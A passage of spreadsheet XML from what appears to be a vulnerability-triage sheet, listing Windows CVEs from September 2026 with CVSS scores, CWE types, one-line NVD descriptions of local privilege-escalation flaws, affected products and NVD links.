      <c r="D1374" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1374" s="5" t="inlineStr"/>
      <c r="H1374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1374" s="5" t="inlineStr"/>
      <c r="J1374" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K137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74" s="5" t="inlineStr"/>
      <c r="M1374" s="5" t="inlineStr"/>
      <c r="N1374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1374" s="5" t="inlineStr"/>
      <c r="Q1374" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1374" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="D1375" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1375" s="5" t="inlineStr"/>
      <c r="H1375" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1375" s="5" t="inlineStr"/>
      <c r="J1375" s="5" t="inlineStr"/>
      <c r="K1375" s="5" t="inlineStr"/>
      <c r="L1375" s="5" t="inlineStr"/>
      <c r="M1375" s="5" t="inlineStr"/>
      <c r="N1375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1375" s="5" t="inlineStr"/>
      <c r="Q1375" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1375" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="D1376" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1376" s="5" t="inlineStr"/>
      <c r="H1376" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1376" s="5" t="inlineStr"/>
      <c r="J1376" s="5" t="inlineStr"/>
      <c r="K1376" s="5" t="inlineStr"/>
      <c r="L1376" s="5" t="inlineStr"/>
      <c r="M1376" s="5" t="inlineStr"/>
      <c r="N1376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1376" s="5" t="inlineStr"/>
      <c r="Q1376" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1376" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="D1377" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1377" s="5" t="inlineStr"/>
      <c r="H1377" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1377" s="5" t="inlineStr"/>
      <c r="J1377" s="5" t="inlineStr"/>
      <c r="K1377" s="5" t="inlineStr"/>
      <c r="L1377" s="5" t="inlineStr"/>
      <c r="M1377" s="5" t="inlineStr"/>
      <c r="N1377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1377" s="5" t="inlineStr"/>
      <c r="Q1377" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1377" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D1378" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1378" s="5" t="inlineStr"/>
      <c r="H1378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1378" s="5" t="inlineStr"/>
      <c r="J1378" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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78" s="5" t="inlineStr"/>
      <c r="M1378" s="5" t="inlineStr"/>
      <c r="N1378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1378" s="5" t="inlineStr"/>
      <c r="Q1378" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1378" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="D1379" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1379" s="5" t="inlineStr"/>
      <c r="H1379" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1379" s="5" t="inlineStr"/>
      <c r="J1379" s="5" t="inlineStr"/>
      <c r="K1379" s="5" t="inlineStr"/>
      <c r="L1379" s="5" t="inlineStr"/>
      <c r="M1379" s="5" t="inlineStr"/>
      <c r="N1379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1379" s="5" t="inlineStr"/>
      <c r="Q1379" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1379" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="D1380" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1380" s="5" t="inlineStr"/>
      <c r="H1380" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1380" s="5" t="inlineStr"/>
      <c r="J1380" s="5" t="inlineStr"/>
      <c r="K1380" s="5" t="inlineStr"/>
      <c r="L1380" s="5" t="inlineStr"/>
      <c r="M1380" s="5" t="inlineStr"/>
      <c r="N1380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1380" s="5" t="inlineStr"/>
      <c r="Q1380" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1380" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="D1381" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1381" s="5" t="inlineStr"/>
      <c r="H1381" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1381" s="5" t="inlineStr"/>
      <c r="J1381" s="5" t="inlineStr"/>
      <c r="K1381" s="5" t="inlineStr"/>
      <c r="L1381" s="5" t="inlineStr"/>
      <c r="M1381" s="5" t="inlineStr"/>
      <c r="N1381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1381" s="5" t="inlineStr"/>
      <c r="Q1381" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1381" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="D1382" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1382" s="5" t="inlineStr"/>
      <c r="H1382" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1382" s="5" t="inlineStr"/>
      <c r="J1382" s="5" t="inlineStr"/>
      <c r="K1382" s="5" t="inlineStr"/>
      <c r="L1382" s="5" t="inlineStr"/>
      <c r="M1382" s="5" t="inlineStr"/>
      <c r="N1382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1382" s="5" t="inlineStr"/>
      <c r="Q1382" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1382" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D1383" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1383" s="5" t="inlineStr"/>
      <c r="H1383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1383" s="5" t="inlineStr"/>
      <c r="J1383" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1383" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1383" s="5" t="inlineStr"/>
      <c r="M1383" s="5" t="inlineStr"/>
      <c r="N1383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1383" s="5" t="inlineStr"/>
      <c r="Q1383" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R1383" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69516</t>
        </is>
      </c>
      <c r="D1384" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1384" s="5" t="inlineStr"/>
      <c r="H1384" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1384" s="5" t="inlineStr"/>
      <c r="J1384" s="5" t="inlineStr"/>
      <c r="K1384" s="5" t="inlineStr"/>
      <c r="L1384" s="5" t="inlineStr"/>
      <c r="M1384" s="5" t="inlineStr"/>
      <c r="N1384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1384" s="5" t="inlineStr"/>
      <c r="Q1384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1384" s="5" t="inlineStr">
        <is>
          <t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="D1385" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1385" s="5" t="inlineStr"/>
      <c r="H1385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1385" s="5" t="inlineStr"/>
      <c r="J1385" s="5" t="inlineStr"/>
      <c r="K1385" s="5" t="inlineStr"/>
      <c r="L1385" s="5" t="inlineStr"/>
      <c r="M1385" s="5" t="inlineStr"/>
      <c r="N1385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1385" s="5" t="inlineStr"/>
      <c r="Q1385" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1385" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="D1386" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1386" s="5" t="inlineStr"/>
      <c r="H1386" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1386" s="5" t="inlineStr"/>
      <c r="J1386" s="5" t="inlineStr"/>
      <c r="K1386" s="5" t="inlineStr"/>
      <c r="L1386" s="5" t="inlineStr"/>
      <c r="M1386" s="5" t="inlineStr"/>
      <c r="N1386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1386" s="5" t="inlineStr"/>
      <c r="Q1386" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1386" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69549</t>
        </is>
      </c>
      <c r="D1387" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1387" s="5" t="inlineStr"/>
      <c r="H1387" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1387" s="5" t="inlineStr"/>
      <c r="J1387" s="5" t="inlineStr"/>
      <c r="K1387" s="5" t="inlineStr"/>
      <c r="L1387" s="5" t="inlineStr"/>
      <c r="M1387" s="5" t="inlineStr"/>
      <c r="N1387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1387" s="5" t="inlineStr"/>
      <c r="Q1387" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="R1387" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="D1388" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1388" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1388" s="5" t="inlineStr"/>
      <c r="H1388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1388" s="5" t="inlineStr"/>
      <c r="J1388" s="5" t="inlineStr"/>
      <c r="K1388" s="5" t="inlineStr"/>
      <c r="L1388" s="5" t="inlineStr"/>
      <c r="M1388" s="5" t="inlineStr"/>
      <c r="N1388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1388" s="5" t="inlineStr"/>
      <c r="Q1388" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1388" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="D1389" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1389" s="5" t="inlineStr"/>
      <c r="H1389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1389" s="5" t="inlineStr"/>
      <c r="J1389" s="5" t="inlineStr"/>
      <c r="K1389" s="5" t="inlineStr"/>
      <c r="L1389" s="5" t="inlineStr"/>
      <c r="M1389" s="5" t="inlineStr"/>
      <c r="N1389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1389" s="5" t="inlineStr"/>
      <c r="Q1389" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="R1389" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="D1390" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1390" s="5" t="inlineStr"/>
      <c r="H1390" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1390" s="5" t="inlineStr"/>
      <c r="J1390" s="5" t="inlineStr"/>
      <c r="K1390" s="5" t="inlineStr"/>
      <c r="L1390" s="5" t="inlineStr"/>
      <c r="M1390" s="5" t="inlineStr"/>
      <c r="N1390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1390" s="5" t="inlineStr"/>
      <c r="Q1390" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1390" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D1391" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1391" s="5" t="inlineStr"/>
      <c r="H1391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1391" s="5" t="inlineStr"/>
      <c r="J1391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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91" s="5" t="inlineStr"/>
      <c r="M1391" s="5" t="inlineStr"/>
      <c r="N1391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1391" s="5" t="inlineStr"/>
      <c r="Q1391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="D1392" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1392" s="5" t="inlineStr"/>
      <c r="H1392" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1392" s="5" t="inlineStr"/>
      <c r="J1392" s="5" t="inlineStr"/>
